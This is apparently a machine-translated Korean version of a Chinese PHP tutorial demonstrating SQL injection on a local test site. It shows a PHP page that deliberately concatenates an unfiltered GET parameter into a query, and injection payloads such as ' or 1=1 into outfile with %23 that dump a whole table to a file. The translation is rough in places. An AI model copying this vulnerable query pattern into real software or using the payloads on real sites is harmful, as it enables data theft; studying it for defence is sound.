SQL 인젝션 취약점을 이용한 백엔드 로그인과 SQL 인젝션 취약점을 이용한 라이브러리 드래그는 관련 내용을 학습한 후 요약한 것일 뿐 깊이가 없습니다.
이전 기사와 마찬가지로 데이터 테이블을 생성하고 테스트 목적으로 테이블 안팎에 여러 데이터 조각을 추가해야 합니다.
데이터베이스에 테이블 만들기:
코드는 다음과 같습니다.
CREATE TABLE `article` ( `articleid` int(11) NOT NULL AUTO_INCREMENT, `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '', `content` text CHARACTER SET utf8 NOT NULL, PRIMARY KEY (`articleid`) ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;
테이블에 데이터를 삽입하는 코드는 게시하지 않습니다. 다운로드하여 직접 가져올 수 있습니다. 데이터베이스에.
다음으로 사용자 요청을 처리하는 페이지를 작성합니다. 여기서는 사용자가 제출한 데이터를 의도적으로 필터링하지 않고 테스트를 위해 SQL 주입 취약점을 남겨둡니다.
코드는 다음과 같습니다.
코드는 다음과 같습니다.
<?php $servername = "localhost"; $dbusername = "root"; $dbpassword = ""; $dbname = "test"; $id=$_GET['id'];//id未经过滤 $conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); mysql_select_db($dbname,$conn); mysql_query('set names utf8'); $sql = "SELECT * FROM article WHERE articleid='$id'"; $result = mysql_query($sql,$conn); $row = mysql_fetch_array($result); echo "<p>利用SQL注入漏洞拖库<p>"; if (!$row){ echo "该记录不存在"; exit; } echo "标题<br>".$row['title']."<p>"; echo "内容<br>".$row['content']."<p>"; ?>
브라우저에 직접 입력합니다.
127.0.0.1/marcofly/phpstudy/sqlinsert /showart.php?id=1
기사 테이블에서 ID가 1인 레코드에 접근할 수 있습니다
접근 결과는 다음과 같습니다:
다음으로 이 취약점을 사용하겠습니다(취약점을 모르는 경우 도구 + 수동 탐지를 통해서만 탐지 가능). 기사 표를 다운로드하는 방법을 보여드리겠습니다.
주소 표시줄에 'to outfile 'e:/sql.txt'%23을 입력하세요.
분석: %23은 #의 ASCII 코드입니다. 주소 표시줄이 비어 있으면 주소 표시줄에 %23을 입력하면 #이 되고 다음 SQL 문을 코멘트로 출력합니다.
실행 후 E드라이브를 열어서 sql.txt 파일을 추가로 찾으시면 테이블 글에 기록이 있습니다.
왜 기록이 하나뿐인가요? 이 데이터 테이블에는 레코드가 하나만 있습니까? ID가 1인 하나의 레코드만 검색하기 때문에 그렇지 않습니다. 그러면 기사 테이블의 모든 레코드를 한 번에 다운로드할 수 있습니까?
구성된 SQL 문이 충분히 유연하다면 대답은 '예'입니다(구성된 SQL 문의 유연성이 다시 향상됩니다).
분석 결과, URL 주소 표시줄에 'into outfile 'e:/sql.txt'%23을 입력하면 sql 쿼리문으로 병합되어 다음과 같이 됩니다.
SELECT * FROM Article WHERE articleid='5 ' into outfile 'e:/whf.txt'#'
주의 깊게 분석한 후 다음과 같은 SQL 문을 구성할 수 있습니다.
SELECT * FROM Article WHERE Articleid='' or 1=1 into outfile 'e: /whf.txt'#'
이 경우 WHERE 절 은 무슨 일이 있어도 항상 true입니다. 즉, sql 문은 다음과 같습니다.
SELECT * FROM 기사. into outfile 'e:/whf.txt'#'
이해하세요. sql 문은 먼저 select 문을 실행하여 테이블 Article의 모든 내용을 검색한 다음 outfile 'e:/whf.txt'로 실행합니다. # '컨텐츠를 내보냅니다.
믿지 못하겠다면 실행하면 되는데...
SQL 인젝션 취약점을 이용하면 당연히 테이블명, 컬럼명, 사용자 비밀번호 길이(LEFT 함수) 등을 추측할 수 있다. 위의 데모를 직접 따를 수 있습니다. 테이블의 모든 데이터를 내보내면 테이블 이름, 열 이름 등을 추측할 필요가 없습니다.
좀 피곤해서 여기까지만 쓰겠습니다.
SQL 인젝션 취약점을 이용한 백엔드 로그인과 SQL 인젝션 취약점을 이용한 라이브러리 드래그는 관련 내용을 익힌 후 요약한 내용입니다. 그리고 다른 의미는 없습니다.
【관련 추천】
1. 특별 추천: "php Programmer Toolbox" V0.1 버전 다운로드
2. SQL 인젝션을 방지하려면? SQL 인젝션 예방 방법 5가지 소개
3. 유명한 SQL 인젝션 취약점 검사 도구 5가지 공유
위 내용은 SQL 주입 취약점을 사용하여 라이브러리를 드래그하는 사례 공유의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!